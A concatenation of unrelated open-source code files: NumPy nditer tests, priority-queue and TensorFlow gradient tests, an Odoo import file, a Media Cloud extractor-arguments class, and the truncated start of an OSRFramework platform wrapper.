[('a', 'f4', (3, 2))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*2*3).reshape(6, 2, 3) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'][:2, 0], a[count]['a'][:, 0]) assert_equal(x['a'][:2, 1], a[count]['a'][:, 1]) assert_equal(x['a'][2,:], [0, 0]) count += 1 def test_iter_buffering_badwriteback(): # Writing back from a buffer cannot combine elements # a needs write buffering, but had a broadcast dimension a = np.arange(6).reshape(2, 3, 1) b = np.arange(12).reshape(2, 3, 2) assert_raises(ValueError, nditer, [a, b], ['buffered', 'external_loop'], [['readwrite'], ['writeonly']], order='C') # But if a is readonly, it's fine nditer([a, b], ['buffered', 'external_loop'], [['readonly'], ['writeonly']], order='C') # If a has just one element, it's fine too (constant 0 stride, a reduction) a = np.arange(1).reshape(1, 1, 1) nditer([a, b], ['buffered', 'external_loop', 'reduce_ok'], [['readwrite'], ['writeonly']], order='C') # check that it fails on other dimensions too a = np.arange(6).reshape(1, 3, 2) assert_raises(ValueError, nditer, [a, b], ['buffered', 'external_loop'], [['readwrite'], ['writeonly']], order='C') a = np.arange(4).reshape(2, 1, 2) assert_raises(ValueError, nditer, [a, b], ['buffered', 'external_loop'], [['readwrite'], ['writeonly']], order='C') def test_iter_buffering_string(): # Safe casting disallows shrinking strings a = np.array(['abc', 'a', 'abcd'], dtype=np.bytes_) assert_equal(a.dtype, np.dtype('S4')) assert_raises(TypeError, nditer, a, ['buffered'], ['readonly'], op_dtypes='S2') i = nditer(a, ['buffered'], ['readonly'], op_dtypes='S6') assert_equal(i[0], asbytes('abc')) assert_equal(i[0].dtype, np.dtype('S6')) a = np.array(['abc', 'a', 'abcd'], dtype=np.unicode) assert_equal(a.dtype, np.dtype('U4')) assert_raises(TypeError, nditer, a, ['buffered'], ['readonly'], op_dtypes='U2') i = nditer(a, ['buffered'], ['readonly'], op_dtypes='U6') assert_equal(i[0], sixu('abc')) assert_equal(i[0].dtype, np.dtype('U6')) def test_iter_buffering_growinner(): # Test that the inner loop grows when no buffering is needed a = np.arange(30) i = nditer(a, ['buffered', 'growinner', 'external_loop'], buffersize=5) # Should end up with just one inner loop here assert_equal(i[0].size, a.size) @dec.slow def test_iter_buffered_reduce_reuse(): # large enough array for all views, including negative strides. a = np.arange(2*3**5)[3**5:3**5+1] flags = ['buffered', 'delay_bufalloc', 'multi_index', 'reduce_ok', 'refs_ok'] op_flags = [('readonly',), ('readwrite', 'allocate')] op_axes_list = [[(0, 1, 2), (0, 1, -1)], [(0, 1, 2), (0, -1, -1)]] # wrong dtype to force buffering op_dtypes = [np.float, a.dtype] def get_params(): for xs in range(-3**2, 3**2 + 1): for ys in range(xs, 3**2 + 1): for op_axes in op_axes_list: # last stride is reduced and because of that not # important for this test, as it is the inner stride. strides = (xs * a.itemsize, ys * a.itemsize, a.itemsize) arr = np.lib.stride_tricks.as_strided(a, (3, 3, 3), strides) for skip in [0, 1]: yield arr, op_axes, skip for arr, op_axes, skip in get_params(): nditer2 = np.nditer([arr.copy(), None], op_axes=op_axes, flags=flags, op_flags=op_flags, op_dtypes=op_dtypes) nditer2.operands[-1][...] = 0 nditer2.reset() nditer2.iterindex = skip for (a2_in, b2_in) in nditer2: b2_in += a2_in.astype(np.int_) comp_res = nditer2.operands[-1] for bufsize in range(0, 3**3): nditer1 = np.nditer([arr, None], op_axes=op_axes, flags=flags, op_flags=op_flags, buffersize=bufsize, op_dtypes=op_dtypes) nditer1.operands[-1][...] = 0 nditer1.reset() nditer1.iterindex = skip for (a1_in, b1_in) in nditer1: b1_in += a1_in.astype(np.int_) res = nditer1.operands[-1] assert_array_equal(res, comp_res) def test_iter_no_broadcast(): # Test that the no_broadcast flag works a = np.arange(24).reshape(2, 3, 4) b = np.arange(6).reshape(2, 3, 1) c = np.arange(12).reshape(3, 4) nditer([a, b, c], [], [['readonly', 'no_broadcast'], ['readonly'], ['readonly']]) assert_raises(ValueError, nditer, [a, b, c], [], [['readonly'], ['readonly', 'no_broadcast'], ['readonly']]) assert_raises(ValueError, nditer, [a, b, c], [], [['readonly'], ['readonly'], ['readonly', 'no_broadcast']]) def test_iter_nested_iters_basic(): # Test nested iteration basic usage a = arange(12).reshape(2, 3, 2) i, j = np.nested_iters(a, [[0], [1, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[0, 1], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[0, 2], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) def test_iter_nested_iters_reorder(): # Test nested iteration basic usage a = arange(12).reshape(2, 3, 2) # In 'K' order (default), it gets reordered i, j = np.nested_iters(a, [[0], [2, 1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[1, 0], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[2, 0], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) # In 'C' order, it doesn't i, j = np.nested_iters(a, [[0], [2, 1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4, 1, 3, 5], [6, 8, 10, 7, 9, 11]]) i, j = np.nested_iters(a, [[1, 0], [2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [6, 7], [2, 3], [8, 9], [4, 5], [10, 11]]) i, j = np.nested_iters(a, [[2, 0], [1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [6, 8, 10], [1, 3, 5], [7, 9, 11]]) def test_iter_nested_iters_flip_axes(): # Test nested iteration with negative axes a = arange(12).reshape(2, 3, 2)[::-1, ::-1, ::-1] # In 'K' order (default), the axes all get flipped i, j = np.nested_iters(a, [[0], [1, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[0, 1], [2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]]) i, j = np.nested_iters(a, [[0, 2], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) # In 'C' order, flipping axes is disabled i, j = np.nested_iters(a, [[0], [1, 2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 10, 9, 8, 7, 6], [5, 4, 3, 2, 1, 0]]) i, j = np.nested_iters(a, [[0, 1], [2]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 10], [9, 8], [7, 6], [5, 4], [3, 2], [1, 0]]) i, j = np.nested_iters(a, [[0, 2], [1]], order='C') vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[11, 9, 7], [10, 8, 6], [5, 3, 1], [4, 2, 0]]) def test_iter_nested_iters_broadcast(): # Test nested iteration with broadcasting a = arange(2).reshape(2, 1) b = arange(3).reshape(1, 3) i, j = np.nested_iters([a, b], [[0], [1]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[[0, 0], [0, 1], [0, 2]], [[1, 0], [1, 1], [1, 2]]]) i, j = np.nested_iters([a, b], [[1], [0]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[[0, 0], [1, 0]], [[0, 1], [1, 1]], [[0, 2], [1, 2]]]) def test_iter_nested_iters_dtype_copy(): # Test nested iteration with a copy to change dtype # copy a = arange(6, dtype='i4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], op_flags=['readonly', 'copy'], op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2], [3, 4, 5]]) vals = None # updateifcopy a = arange(6, dtype='f4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], op_flags=['readwrite', 'updateifcopy'], casting='same_kind', op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) for x in i: for y in j: y[...] += 1 assert_equal(a, [[0, 1, 2], [3, 4, 5]]) i, j, x, y = (None,)*4 # force the updateifcopy assert_equal(a, [[1, 2, 3], [4, 5, 6]]) def test_iter_nested_iters_dtype_buffered(): # Test nested iteration with buffering to change dtype a = arange(6, dtype='f4').reshape(2, 3) i, j = np.nested_iters(a, [[0], [1]], flags=['buffered'], op_flags=['readwrite'], casting='same_kind', op_dtypes='f8') assert_equal(j[0].dtype, np.dtype('f8')) for x in i: for y in j: y[...] += 1 assert_equal(a, [[1, 2, 3], [4, 5, 6]]) def test_iter_reduction_error(): a = np.arange(6) assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0], [-1]]) a = np.arange(6).reshape(2, 3) assert_raises(ValueError, nditer, [a, None], ['external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0, 1], [-1, -1]]) def test_iter_reduction(): # Test doing reductions with the iterator a = np.arange(6) i = nditer([a, None], ['reduce_ok'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0], [-1]]) # Need to initialize the output operand to the addition unit i.operands[1][...] = 0 # Do the reduction for x, y in i: y[...] += x # Since no axes were specified, should have allocated a scalar assert_equal(i.operands[1].ndim, 0) assert_equal(i.operands[1], np.sum(a)) a = np.arange(6).reshape(2, 3) i = nditer([a, None], ['reduce_ok', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[0, 1], [-1, -1]]) # Need to initialize the output operand to the addition unit i.operands[1][...] = 0 # Reduction shape/strides for the output assert_equal(i[1].shape, (6,)) assert_equal(i[1].strides, (0,)) # Do the reduction for x, y in i: y[...] += x # Since no axes were specified, should have allocated a scalar assert_equal(i.operands[1].ndim, 0) assert_equal(i.operands[1], np.sum(a)) # This is a tricky reduction case for the buffering double loop # to handle a = np.ones((2, 3, 5)) it1 = nditer([a, None], ['reduce_ok', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[None, [0, -1, 1]]) it2 = nditer([a, None], ['reduce_ok', 'external_loop', 'buffered', 'delay_bufalloc'], [['readonly'], ['readwrite', 'allocate']], op_axes=[None, [0, -1, 1]], buffersize=10) it1.operands[1].fill(0) it2.operands[1].fill(0) it2.reset() for x in it1: x[1][...] += x[0] for x in it2: x[1][...] += x[0] assert_equal(it1.operands[1], it2.operands[1]) assert_equal(it2.operands[1].sum(), a.size) def test_iter_buffering_reduction(): # Test doing buffered reductions with the iterator a = np.arange(6) b = np.array(0., dtype='f8').byteswap().newbyteorder() i = nditer([a, b], ['reduce_ok', 'buffered'], [['readonly'], ['readwrite', 'nbo']], op_axes=[[0], [-1]]) assert_equal(i[1].dtype, np.dtype('f8')) assert_(i[1].dtype != b.dtype) # Do the reduction for x, y in i: y[...] += x # Since no axes were specified, should have allocated a scalar assert_equal(b, np.sum(a)) a = np.arange(6).reshape(2, 3) b = np.array([0, 0], dtype='f8').byteswap().newbyteorder() i = nditer([a, b], ['reduce_ok', 'external_loop', 'buffered'], [['readonly'], ['readwrite', 'nbo']], op_axes=[[0, 1], [0, -1]]) # Reduction shape/strides for the output assert_equal(i[1].shape, (3,)) assert_equal(i[1].strides, (0,)) # Do the reduction for x, y in i: y[...] += x assert_equal(b, np.sum(a, axis=1)) # Iterator inner double loop was wrong on this one p = np.arange(2) + 1 it = np.nditer([p, None], ['delay_bufalloc', 'reduce_ok', 'buffered', 'external_loop'], [['readonly'], ['readwrite', 'allocate']], op_axes=[[-1, 0], [-1, -1]], itershape=(2, 2)) it.operands[1].fill(0) it.reset() assert_equal(it[0], [1, 2, 1, 2]) def test_iter_buffering_reduction_reuse_reduce_loops(): # There was a bug triggering reuse of the reduce loop inappropriately, # which caused processing to happen in unnecessarily small chunks # and overran the buffer. a = np.zeros((2, 7)) b = np.zeros((1, 7)) it = np.nditer([a, b], flags=['reduce_ok', 'external_loop', 'buffered'], op_flags=[['readonly'], ['readwrite']], buffersize=5) bufsizes = [] for x, y in it: bufsizes.append(x.shape[0]) assert_equal(bufsizes, [5, 2, 5, 2]) assert_equal(sum(bufsizes), a.size) def test_iter_writemasked_badinput(): a = np.zeros((2, 3)) b = np.zeros((3,)) m = np.array([[True, True, False], [False, True, False]]) m2 = np.array([True, True, False]) m3 = np.array([0, 1, 1], dtype='u1') mbad1 = np.array([0, 1, 1], dtype='i1') mbad2 = np.array([0, 1, 1], dtype='f4') # Need an 'arraymask' if any operand is 'writemasked' assert_raises(ValueError, nditer, [a, m], [], [['readwrite', 'writemasked'], ['readonly']]) # A 'writemasked' operand must not be readonly assert_raises(ValueError, nditer, [a, m], [], [['readonly', 'writemasked'], ['readonly', 'arraymask']]) # 'writemasked' and 'arraymask' may not be used together assert_raises(ValueError, nditer, [a, m], [], [['readonly'], ['readwrite', 'arraymask', 'writemasked']]) # 'arraymask' may only be specified once assert_raises(ValueError, nditer, [a, m, m2], [], [['readwrite', 'writemasked'], ['readonly', 'arraymask'], ['readonly', 'arraymask']]) # An 'arraymask' with nothing 'writemasked' also doesn't make sense assert_raises(ValueError, nditer, [a, m], [], [['readwrite'], ['readonly', 'arraymask']]) # A writemasked reduction requires a similarly smaller mask assert_raises(ValueError, nditer, [a, b, m], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readonly', 'arraymask']]) # But this should work with a smaller/equal mask to the reduction operand np.nditer([a, b, m2], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readonly', 'arraymask']]) # The arraymask itself cannot be a reduction assert_raises(ValueError, nditer, [a, b, m2], ['reduce_ok'], [['readonly'], ['readwrite', 'writemasked'], ['readwrite', 'arraymask']]) # A uint8 mask is ok too np.nditer([a, m3], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') # An int8 mask isn't ok assert_raises(TypeError, np.nditer, [a, mbad1], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') # A float32 mask isn't ok assert_raises(TypeError, np.nditer, [a, mbad2], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['f4', None], casting='same_kind') def test_iter_writemasked(): a = np.zeros((3,), dtype='f8') msk = np.array([True, True, False]) # When buffering is unused, 'writemasked' effectively does nothing. # It's up to the user of the iterator to obey the requested semantics. it = np.nditer([a, msk], [], [['readwrite', 'writemasked'], ['readonly', 'arraymask']]) for x, m in it: x[...] = 1 # Because we violated the semantics, all the values became 1 assert_equal(a, [1, 1, 1]) # Even if buffering is enabled, we still may be accessing the array # directly. it = np.nditer([a, msk], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']]) for x, m in it: x[...] = 2.5 # Because we violated the semantics, all the values became 2.5 assert_equal(a, [2.5, 2.5, 2.5]) # If buffering will definitely happening, for instance because of # a cast, only the items selected by the mask will be copied back from # the buffer. it = np.nditer([a, msk], ['buffered'], [['readwrite', 'writemasked'], ['readonly', 'arraymask']], op_dtypes=['i8', None], casting='unsafe') for x, m in it: x[...] = 3 # Even though we violated the semantics, only the selected values # were copied back assert_equal(a, [3, 3, 2.5]) def test_iter_non_writable_attribute_deletion(): it = np.nditer(np.ones(2)) attr = ["value", "shape", "operands", "itviews", "has_delayed_bufalloc", "iterationneedsapi", "has_multi_index", "has_index", "dtypes", "ndim", "nop", "itersize", "finished"] for s in attr: assert_raises(AttributeError, delattr, it, s) def test_iter_writable_attribute_deletion(): it = np.nditer(np.ones(2)) attr = [ "multi_index", "index", "iterrange", "iterindex"] for s in attr: assert_raises(AttributeError, delattr, it, s) def test_iter_element_deletion(): it = np.nditer(np.ones(3)) try: del it[1] del it[1:2] except TypeError: pass except: raise AssertionError def test_iter_allocated_array_dtypes(): # If the dtype of an allocated output has a shape, the shape gets # tacked onto the end of the result. it = np.nditer(([1, 3, 20], None), op_dtypes=[None, ('i4', (2,))]) for a, b in it: b[0] = a - 1 b[1] = a + 1 assert_equal(it.operands[1], [[0, 2], [2, 4], [19, 21]]) # Make sure this works for scalars too it = np.nditer((10, 2, None), op_dtypes=[None, None, ('i4', (2, 2))]) for a, b, c in it: c[0, 0] = a - b c[0, 1] = a + b c[1, 0] = a * b c[1, 1] = a / b assert_equal(it.operands[2], [[8, 12], [20, 5]]) def test_0d_iter(): # Basic test for iteration of 0-d arrays: i = nditer([2, 3], ['multi_index'], [['readonly']]*2) assert_equal(i.ndim, 0) assert_equal(next(i), (2, 3)) assert_equal(i.multi_index, ()) assert_equal(i.iterindex, 0) assert_raises(StopIteration, next, i) # test reset: i.reset() assert_equal(next(i), (2, 3)) assert_raises(StopIteration, next, i) # test forcing to 0-d i = nditer(np.arange(5), ['multi_index'], [['readonly']], op_axes=[()]) assert_equal(i.ndim, 0) assert_equal(len(i), 1) # note that itershape=(), still behaves like None due to the conversions # Test a more complex buffered casting case (same as another test above) sdt = [('a', 'f4'), ('b', 'i8'), ('c', 'c8', (2, 3)), ('d', 'O')] a = np.array(0.5, dtype='f4') i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt) vals = next(i) assert_equal(vals['a'], 0.5) assert_equal(vals['b'], 0) assert_equal(vals['c'], [[(0.5)]*3]*2) assert_equal(vals['d'], 0.5) def test_0d_nested_iter(): a = np.arange(12).reshape(2, 3, 2) i, j = np.nested_iters(a, [[], [1, 0, 2]]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]]) i, j = np.nested_iters(a, [[1, 0, 2], []]) vals = [] for x in i: vals.append([y for y in j]) assert_equal(vals, [[0], [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11]]) i, j, k = np.nested_iters(a, [[2, 0], [], [1]]) vals = [] for x in i: for y in j: vals.append([z for z in k]) assert_equal(vals, [[0, 2, 4], [1, 3, 5], [6, 8, 10], [7, 9, 11]]) def test_iter_too_large(): # The total size of the iterator must not exceed the maximum intp due # to broadcasting. Dividing by 1024 will keep it small enough to # give a legal array. size = np.iinfo(np.intp).max // 1024 arr = np.lib.stride_tricks.as_strided(np.zeros(1), (size,), (0,)) assert_raises(ValueError, nditer, (arr, arr[:, None])) # test the same for multiindex. That may get more interesting when # removing 0 dimensional axis is allowed (since an iterator can grow then) assert_raises(ValueError, nditer, (arr, arr[:, None]), flags=['multi_index']) def test_iter_too_large_with_multiindex(): # When a multi index is being tracked, the error is delayed this # checks the delayed error messages and getting below that by # removing an axis. base_size = 2**10 num = 1 while base_size**num < np.iinfo(np.intp).max: num += 1 shape_template = [1, 1] * num arrays = [] for i in range(num): shape = shape_template[:] shape[i * 2] = 2**10 arrays.append(np.empty(shape)) arrays = tuple(arrays) # arrays are now too large to be broadcast. The different modes test # different nditer functionality with or without GIL. for mode in range(6): assert_raises(ValueError, test_nditer_too_large, arrays, -1, mode) # but if we do nothing with the nditer, it can be constructed: test_nditer_too_large(arrays, -1, 7) # When an axis is removed, things should work again (half the time): for i in range(num): for mode in range(6): # an axis with size 1024 is removed: test_nditer_too_large(arrays, i*2, mode) # an axis with size 1 is removed: assert_raises(ValueError, test_nditer_too_large, arrays, i*2 + 1, mode) if __name__ == "__main__": run_module_suite()
bsd-3-clause
ptrompeter/data-structures
tests/test_priority.py
1
1333
from src.priority import Priority TEST_LIST = [ (2, 1), (5, 1), (1, 1), (2, 2), (1, 2), (2, 3), (5, 2), (4, 1), (6, 1), (8, 1), (1, 3), (2, 4), ] def test_pri_push(): test_pri = Priority() test_pri.push((1, 'a')) assert test_pri.plist[0] == (1, 'a') def test_pri_push1(): test_pri = Priority() test_pri.push((3, 'a')) test_pri.push((3, 'b')) test_pri.push((3, 'c')) test_pri.push((3, 'd')) assert test_pri.plist[0][1] == 'a' def test_pri_push2(): test_pri = Priority() test_pri.push((3, 'a')) test_pri.push((3, 'b')) test_pri.push((3, 'c')) test_pri.push((3, 'd')) test_pri.push((2, 'a')) assert test_pri.plist[0] == (2, 'a') def test_pri_push3(): test_pri = Priority(TEST_LIST) assert test_pri.plist[0][0] == 1 def test_pri_push4(): test_pri = Priority(TEST_LIST) assert test_pri.plist[0] == (1, 1) def test_pri_pop(): test_pri = Priority(TEST_LIST) test_pri.pop() assert test_pri.plist[0][0] == 1 def test_pri_pop2(): test_pri = Priority(TEST_LIST) test_pri.pop() test_pri.pop() assert test_pri.plist[0][0] == 1 def test_pri_pop3(): test_pri = Priority(TEST_LIST) test_pri.pop() test_pri.pop() test_pri.pop() assert test_pri.plist[0][0] == 2
mit
rdipietro/tensorflow
tensorflow/python/ops/math_grad_test.py
20
5921
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for Python ops defined in math_grad.py.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf class SquaredDifferenceOpTest(tf.test.TestCase): def _testGrad(self, left_shape, right_shape): if len(left_shape) > len(right_shape): output_shape = left_shape else: output_shape = right_shape l = np.random.randn(*left_shape) r = np.random.randn(*right_shape) with self.test_session(use_gpu=True): left_tensor = tf.constant(l, shape=left_shape) right_tensor = tf.constant(r, shape=right_shape) output = tf.squared_difference(left_tensor, right_tensor) left_err = tf.test.compute_gradient_error(left_tensor, left_shape, output, output_shape, x_init_value=l) right_err = tf.test.compute_gradient_error(right_tensor, right_shape, output, output_shape, x_init_value=r) self.assertLess(left_err, 1e-10) self.assertLess(right_err, 1e-10) def testGrad(self): self._testGrad([1, 2, 3, 2], [3, 2]) self._testGrad([2, 4], [3, 2, 4]) class AbsOpTest(tf.test.TestCase): def _biasedRandN(self, shape, bias=0.1, sigma=1.0): """Returns samples from a normal distribution shifted `bias` away from 0.""" value = np.random.randn(*shape) * sigma return value + np.sign(value) * bias def _testGrad(self, shape, dtype=None, max_error=None, bias=None, sigma=None): np.random.seed(7) if dtype in (tf.complex64, tf.complex128): value = tf.complex(self._biasedRandN(shape, bias=bias, sigma=sigma), self._biasedRandN(shape, bias=bias, sigma=sigma)) else: value = tf.convert_to_tensor(self._biasedRandN(shape, bias=bias), dtype=dtype) with self.test_session(use_gpu=True): if dtype in (tf.complex64, tf.complex128): output = tf.complex_abs(value) else: output = tf.abs(value) error = tf.test.compute_gradient_error( value, shape, output, output.get_shape().as_list()) self.assertLess(error, max_error) def testComplexAbs(self): # Bias random test values away from zero to avoid numeric instabilities. self._testGrad([3, 3], dtype=tf.float32, max_error=2e-5, bias=0.1, sigma=1.0) self._testGrad([3, 3], dtype=tf.complex64, max_error=2e-5, bias=0.1, sigma=1.0) # Ensure stability near the pole at zero. self._testGrad([3, 3], dtype=tf.float32, max_error=100.0, bias=0.0, sigma=0.1) self._testGrad([3, 3], dtype=tf.complex64, max_error=100.0, bias=0.0, sigma=0.1) class MinOrMaxGradientTest(tf.test.TestCase): def testMinGradient(self): inputs = tf.constant([1.0], dtype=tf.float32) outputs = tf.reduce_min(tf.concat(0, [inputs, inputs])) with self.test_session(): error = tf.test.compute_gradient_error(inputs, [1], outputs, []) self.assertLess(error, 1e-4) def testMaxGradient(self): inputs = tf.constant([1.0], dtype=tf.float32) outputs = tf.reduce_max(tf.concat(0, [inputs, inputs])) with self.test_session(): error = tf.test.compute_gradient_error(inputs, [1], outputs, []) self.assertLess(error, 1e-4) class SegmentMinOrMaxGradientTest(tf.test.TestCase): def testSegmentMinGradient(self): data = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32) segment_ids = tf.constant([0, 0, 1], dtype=tf.int64) segment_min = tf.segment_min(data, segment_ids) with self.test_session(): error = tf.test.compute_gradient_error(data, [3], segment_min, [2]) self.assertLess(error, 1e-4) def testSegmentMaxGradient(self): data = tf.constant([1.0, 2.0, 3.0], dtype=tf.float32) segment_ids = tf.constant([0, 0, 1], dtype=tf.int64) segment_max = tf.segment_max(data, segment_ids) with self.test_session(): error = tf.test.compute_gradient_error(data, [3], segment_max, [2]) self.assertLess(error, 1e-4) def testSegmentMinGradientWithTies(self): inputs = tf.constant([1.0], dtype=tf.float32) data = tf.concat(0, [inputs, inputs]) segment_ids = tf.constant([0, 0], dtype=tf.int64) segment_min = tf.segment_min(data, segment_ids) with self.test_session(): error = tf.test.compute_gradient_error(inputs, [1], segment_min, [1]) self.assertLess(error, 1e-4) def testSegmentMaxGradientWithTies(self): inputs = tf.constant([1.0], dtype=tf.float32) data = tf.concat(0, [inputs, inputs]) segment_ids = tf.constant([0, 0], dtype=tf.int64) segment_max = tf.segment_max(data, segment_ids) with self.test_session(): error = tf.test.compute_gradient_error(inputs, [1], segment_max, [1]) self.assertLess(error, 1e-4) if __name__ == "__main__": tf.test.main()
apache-2.0
sodexis/odoo
addons/stock/wizard/__init__.py
323
1149
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import stock_move import stock_return_picking import stock_change_product_qty import make_procurement_product import orderpoint_procurement import stock_transfer_details
agpl-3.0
berkmancenter/mediacloud
apps/extract-and-vector/src/python/extract_and_vector/dbi/stories/extractor_arguments.py
1
2882
from mediawords.util.perl import decode_object_from_bytes_if_needed # MC_REWRITE_TO_PYTHON: rename back to ExtractorArguments after rewrite class PyExtractorArguments(object): """Arguments to process_extracted_story() that define how story is to be extracted.""" # MC_REWRITE_TO_PYTHON: remake into data class / properties after Python rewrite __slots__ = [ '__no_dedup_sentences', '__no_delete', '__no_tag_extractor_version', '__use_cache', '__use_existing', ] def __init__(self, no_dedup_sentences: bool = False, no_delete: bool = False, no_tag_extractor_version: bool = False, use_cache: bool = False, use_existing: bool = False): """Constructor.""" if isinstance(no_dedup_sentences, bytes): no_dedup_sentences = decode_object_from_bytes_if_needed(no_dedup_sentences) if isinstance(no_delete, bytes): no_delete = decode_object_from_bytes_if_needed(no_delete) if isinstance(no_tag_extractor_version, bytes): no_tag_extractor_version = decode_object_from_bytes_if_needed(no_tag_extractor_version) if isinstance(use_cache, bytes): use_cache = decode_object_from_bytes_if_needed(use_cache) if isinstance(use_existing, bytes): use_existing = decode_object_from_bytes_if_needed(use_existing) # MC_REWRITE_TO_PYTHON: remove weird casts after Python rewrite no_dedup_sentences = bool(int(no_dedup_sentences)) no_delete = bool(int(no_delete)) no_tag_extractor_version = bool(int(no_tag_extractor_version)) use_cache = bool(int(use_cache)) use_existing = bool(int(use_existing)) self.__no_dedup_sentences = no_dedup_sentences self.__no_delete = no_delete self.__no_tag_extractor_version = no_tag_extractor_version self.__use_cache = use_cache self.__use_existing = use_existing def no_dedup_sentences(self) -> bool: """Return True if sentences don't have to be deduplicated.""" return self.__no_dedup_sentences def no_delete(self) -> bool: """Return True if old sentences don't have to be deleted before inserting new ones.""" return self.__no_delete def no_tag_extractor_version(self) -> bool: """Return True if tagging story with extractor's version is to be skipped.""" return self.__no_tag_extractor_version def use_cache(self) -> bool: """Return True if the extractor should return a cached extractor result (if one is present in cache).""" return self.__use_cache def use_existing(self) -> bool: """Return True if extraction is to be skipped if the extracted text already exists in "download_texts".""" return self.__use_existing
agpl-3.0
i3visio/osrframework
osrframework/wrappers/myeloma.py
1
3879
################################################################################ # # Copyright 2015-2020 Félix Brezo and Yaiza Rubio # # This program is part of OSRFramework. You can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ################################################################################ __author__ = "Felix Brezo, Yaiza Rubio <contacto@i3visio.com>" __version__ = "2.0" from osrframework.utils.platforms import Platform class Myeloma(Platform): """A <Platform> object for Myeloma""" def __init__(self): self.platformName = "Myeloma" self.tags = ["opinions"] ######################## # Defining valid modes # ######################## self.isValidMode = {} self.isValidMode["phonefy"] = False self.isValidMode["usufy"] = True self.isValidMode["searchfy"] = False ###################################### # Search URL for the different modes # ###################################### # Strings with the URL for each and every mode self.url = {} #self.url["phonefy"] = "http://anyurl.com//phone/" + "<phonefy>" 